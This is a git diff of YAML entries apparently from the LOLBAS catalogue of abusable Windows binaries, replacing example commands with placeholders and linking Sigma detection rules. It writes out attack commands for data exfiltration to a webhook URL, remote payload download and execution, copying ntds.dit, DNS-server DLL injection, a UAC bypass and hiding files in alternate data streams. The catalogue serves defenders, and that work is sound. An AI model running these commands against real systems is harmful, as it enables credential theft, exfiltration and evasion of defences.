Windows 11 - - Command: csc -target:library File.cs - Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to a DLL file. + - Command: csc -target:library {PATH:.cs} + Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to a DLL file with the same name. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User 
@@ -25,8 +25,6 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 129672d..c5591a2 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -1,10 +1,10 @@ --- Name: Cscript.exe Description: Binary used to execute scripts in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: cscript //e:vbscript c:\ads\file.txt:script.vbs + - Command: cscript //e:vbscript {PATH_ABSOLUTE}:script.vbs Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS diff --git a/yml/OSBinaries/CustomShellHost.yml b/yml/OSBinaries/CustomShellHost.yml index 7390b35..b618027 100644 --- a/yml/OSBinaries/CustomShellHost.yml +++ b/yml/OSBinaries/CustomShellHost.yml @@ -1,7 +1,7 @@ --- Name: CustomShellHost.exe Description: A host process that is used by custom shells when using Windows in Kiosk mode. -Author: 'Wietze Beukema' +Author: Wietze Beukema Created: 2021-11-14 Commands: - Command: CustomShellHost.exe diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml index 2321e38..4712e4b 100644 --- a/yml/OSBinaries/DataSvcUtil.yml +++ b/yml/OSBinaries/DataSvcUtil.yml 
@@ -1,10 +1,10 @@ --- Name: DataSvcUtil.exe Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. -Author: 'Ialle Teixeira' +Author: Ialle Teixeira Created: 2020-12-01 Commands: - - Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile + - Command: DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL} Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml index 5e51a01..ca470e6 100644 --- a/yml/OSBinaries/Desktopimgdownldr.yml +++ b/yml/OSBinaries/Desktopimgdownldr.yml @@ -4,7 +4,7 @@ Description: Windows binary used to configure lockscreen/desktop image Author: Gal Kristal Created: 2020-06-28 Commands: - - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr + - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr Description: Downloads the file and sets it as the computer's lockscreen Usecase: Download arbitrary files from a web server Category: Download @@ -13,8 +13,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\desktopimgdownldr.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml 
diff --git a/yml/OSBinaries/DeviceCredentialDeployment.yml b/yml/OSBinaries/DeviceCredentialDeployment.yml index 019ea43..6579fe0 100644 --- a/yml/OSBinaries/DeviceCredentialDeployment.yml +++ b/yml/OSBinaries/DeviceCredentialDeployment.yml @@ -1,8 +1,8 @@ --- Name: DeviceCredentialDeployment.exe Description: Device Credential Deployment -Author: 'Elliot Killick' -Created: '2021-08-16' +Author: Elliot Killick +Created: 2021-08-16 Commands: - Command: DeviceCredentialDeployment Description: Grab the console window handle and set it to hidden diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index ab8ca26..f8df5a7 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -1,10 +1,10 @@ --- Name: Dfsvc.exe Description: ClickOnce engine in Windows used by .NET -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo + - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL} Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) Usecase: Use binary to bypass Application whitelisting Category: AWL Bypass @@ -19,8 +19,6 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml index 832b996..d4de7e6 100644 --- a/yml/OSBinaries/Diantz.yml +++ b/yml/OSBinaries/Diantz.yml 
@@ -4,8 +4,8 @@ Description: Binary that package existing files into a cabinet (.cab) file Author: Tamir Yehuda Created: 2020-08-08 Commands: - - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab - Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file. + - Command: diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab + Description: Compress a file (first argument) into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an Alternate Data Stream. Category: ADS Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. Tags: - Type: Compression - - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab - Description: Download and compress a remote file and store it in a cab file on local machine. + - Command: diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab} + Description: Download and compress a remote file and store it in a CAB file on local machine. Usecase: Download and compress into a cab file. Category: Download Privileges: User @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019 Tags: - Type: Compression - - Command: diantz /f directives.ddf + - Command: diantz /f {PATH:.ddf} Description: Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification. Usecase: Bypass command-line based detections Category: Execute 
@@ -34,8 +34,6 @@ Commands: Full_Path: - Path: c:\windows\system32\diantz.exe - Path: c:\windows\syswow64\diantz.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index c54501f..46a84ad 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -1,10 +1,10 @@ --- Name: Diskshadow.exe Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: diskshadow.exe /s c:\test\diskshadow.txt + - Command: diskshadow.exe /s {PATH:.txt} Description: Execute commands using diskshadow.exe from a prepared diskshadow script. Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit Category: Dump @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows server Tags: - Execute: CMD - - Command: diskshadow> exec calc.exe + - Command: diskshadow> exec {PATH:.exe} Description: Execute commands using diskshadow.exe to spawn child process Usecase: Use diskshadow to bypass defensive counter measures Category: Execute @@ -25,8 +25,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml 
diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 613ce76..260fe20 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -1,10 +1,10 @@ --- Name: Dnscmd.exe Description: A command-line interface for managing DNS servers -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll + - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll} Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. Usecase: Remotely inject dll to dns server Category: Execute @@ -28,7 +28,6 @@ Resources: - Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html Acknowledgement: - Person: Shay Ber - Handle: - Person: Dimitrios Slamaris Handle: '@dim0x69' - Person: Nikhil SamratAshok diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index 378d7c2..31014eb 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml 
@@ -1,45 +1,45 @@ --- Name: Esentutl.exe Description: Binary for working with Microsoft Joint Engine Technology (JET) database -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o + - Command: esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o Description: Copies the source VBS file to the destination VBS file. Usecase: Copies files from A to B Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o + - Command: esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o + - Command: esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. Usecase: Extract hidden file within alternate data streams Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o + - Command: esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. 
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o + - Command: esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o Description: Copies the source EXE to the destination EXE file Usecase: Use to copy files from one unc path to another Category: Download Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit + - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d {PATH_ABSOLUTE:.dit} Description: Copies a (locked) file using Volume Shadow Copy Usecase: Copy/extract a locked file such as the AD Database Category: Copy @@ -49,8 +49,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index d8beeea..56e4bde 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -1,7 +1,7 @@ --- Name: Eventvwr.exe Description: Displays Windows Event Logs in a GUI window. -Author: 'Jacob Gajek' +Author: Jacob Gajek Created: 2018-11-01 Commands: - Command: eventvwr.exe 
@@ -14,7 +14,7 @@ Commands: Tags: - Application: GUI - Execute: EXE - - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe + - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. Category: UAC Bypass diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index 0bd732d..c6fa3f2 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml 
@@ -1,24 +1,24 @@ --- Name: Expand.exe Description: Binary that expands one or more compressed files -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat + - Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat} Description: Copies source file to destination. Usecase: Use to copies the source file to the destination file Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat + - Command: expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext} Description: Copies source file to destination. Usecase: Copies files from A to B Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat + - Command: expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat Description: Copies source file to destination Alternate Data Stream (ADS) Usecase: Copies files from A to B Category: ADS diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index 1c0e2ff..044c44c 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -4,8 +4,8 @@ Description: Binary used for managing files and system components within Windows Author: Jai Minton Created: 2020-06-24 Commands: - - Command: explorer.exe /root,"C:\Windows\System32\calc.exe" - Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe + - Command: explorer.exe /root,"{PATH_ABSOLUTE:.exe}" + Description: Execute specified .exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. Category: Execute Privileges: User 
@@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: explorer.exe C:\Windows\System32\notepad.exe + - Command: explorer.exe {PATH_ABSOLUTE:.exe} Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. Category: Execute diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index c75e30a..dfe25bb 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -1,11 +1,11 @@ --- Name: Extexport.exe Description: Load a DLL located in the c:\test folder with a specific name. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Extexport.exe c:\test foo bar - Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll + - Command: Extexport.exe {PATH_ABSOLUTE:folder} foo bar + Description: Load a DLL located in the specified folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll. Usecase: Execute dll file Category: Execute Privileges: User diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 251118b..68b94da 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -1,10 +1,10 @@ --- Name: Extrac32.exe Description: Extract to ADS, copy or overwrite a file with Extrac32.exe -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe + - Command: extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. Usecase: Extract data from cab file and hide it in an alternate data stream. Category: ADS 
@@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe + - Command: extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. Usecase: Extract data from cab file and hide it in an alternate data stream. Category: ADS @@ -22,15 +22,15 @@ Commands: OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Type: Compression - - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt + - Command: extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE} Description: Copy the source file to the destination file and overwrite it. Usecase: Download file from UNC/WEBDav Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe - Description: Command for copying calc.exe to another folder + - Command: extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe} + Description: Command for copying file from one folder to another Usecase: Copy file Category: Copy Privileges: User @@ -39,8 +39,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\extrac32.exe - Path: C:\Windows\SysWOW64\extrac32.exe -Code_Sample: - - Code: Detection: - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml 
diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 31c3af5..739ec2b 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -1,17 +1,17 @@ --- Name: Findstr.exe Description: Write to ADS, discover, or download files with Findstr.exe -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe - Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. + - Command: findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe + Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) the specified .exe file is written to an Alternate Data Stream (ADS) of the specified target file. Usecase: Add a file to an alternate data stream to hide from defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe + - Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures Category: ADS 
@@ -25,7 +25,7 @@ Commands: Privileges: User MitreID: T1552.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe + - Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE:.exe} Description: Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file. Usecase: Download/Copy file from webdav server Category: Download @@ -35,8 +35,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\findstr.exe - Path: C:\Windows\SysWOW64\findstr.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml Resources: diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index a236872..0c1968e 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -1,11 +1,11 @@ --- Name: Forfiles.exe Description: Selects and executes a command on a file or set of files. This command is useful for batch processing. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe - Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. + - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{CMD}" + Description: Executes specified command since there is a match for notepad.exe in the c:\windows\System32 folder. Usecase: Use forfiles to start a new process to evade defensive counter measures Category: Execute Privileges: User 
@@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" + - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{PATH_ABSOLUTE}:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream Category: ADS @@ -25,8 +25,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml Resources: diff --git a/yml/OSBinaries/Fsutil.yml b/yml/OSBinaries/Fsutil.yml index e4b38ed..28593e4 100644 --- a/yml/OSBinaries/Fsutil.yml +++ b/yml/OSBinaries/Fsutil.yml @@ -1,10 +1,10 @@ --- Name: Fsutil.exe Description: File System Utility -Author: 'Elliot Killick' +Author: Elliot Killick Created: 2021-08-16 Commands: - - Command: fsutil.exe file setZeroData offset=0 length=9999999999 C:\Windows\Temp\payload.dll + - Command: fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE} Description: Zero out a file Usecase: Can be used to forensically erase a file Category: Tamper diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 6b4828b..938e2ce 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml 
@@ -1,10 +1,10 @@ --- Name: Ftp.exe Description: A binary designed for connecting to FTP servers -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-12-10 Commands: - - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt + - Command: echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt Description: Executes the commands you put inside the text file. Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand Category: Execute @@ -23,8 +23,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\ftp.exe - Path: C:\Windows\SysWOW64\ftp.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml - IOC: cmd /c as child process of ftp.exe diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 3ac6adc..1c5f0b0 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -1,7 +1,7 @@ --- Name: Gpscript.exe Description: Used by group policy to process scripts -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Gpscript /logon @@ -25,8 +25,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml - IOC: Scripts added in local group policy diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index 27af482..bb1798e 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml 
@@ -1,11 +1,11 @@ --- Name: Hh.exe Description: Binary used for processing chm files in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: HH.exe http://some.url/script.ps1 - Description: Open the target PowerShell script with HTML Help. + - Command: HH.exe {REMOTEURL:.bat} + Description: Open the target batch script with HTML Help. Usecase: Download files from url Category: Download Privileges: User @@ -14,8 +14,8 @@ Commands: Tags: - Execute: EXE - Application: GUI - - Command: HH.exe c:\windows\system32\calc.exe - Description: Executes calc.exe with HTML Help. + - Command: HH.exe {PATH_ABSOLUTE:.exe} + Description: Executes specified executable with HTML Help. Usecase: Execute process with HH.exe Category: Execute Privileges: User @@ -24,8 +24,8 @@ Commands: Tags: - Execute: EXE - Application: GUI - - Command: HH.exe http://some.url/payload.chm - Description: Executes a remote payload.chm file which can contain commands. + - Command: HH.exe {REMOTEURL:.chm} + Description: Executes a remote .chm file which can contain commands. Usecase: Execute commands with HH.exe Category: Execute Privileges: User @@ -38,8 +38,6 @@ Commands: Full_Path: - Path: C:\Windows\hh.exe - Path: C:\Windows\SysWOW64\hh.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index 7803476..5dd0756 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml 
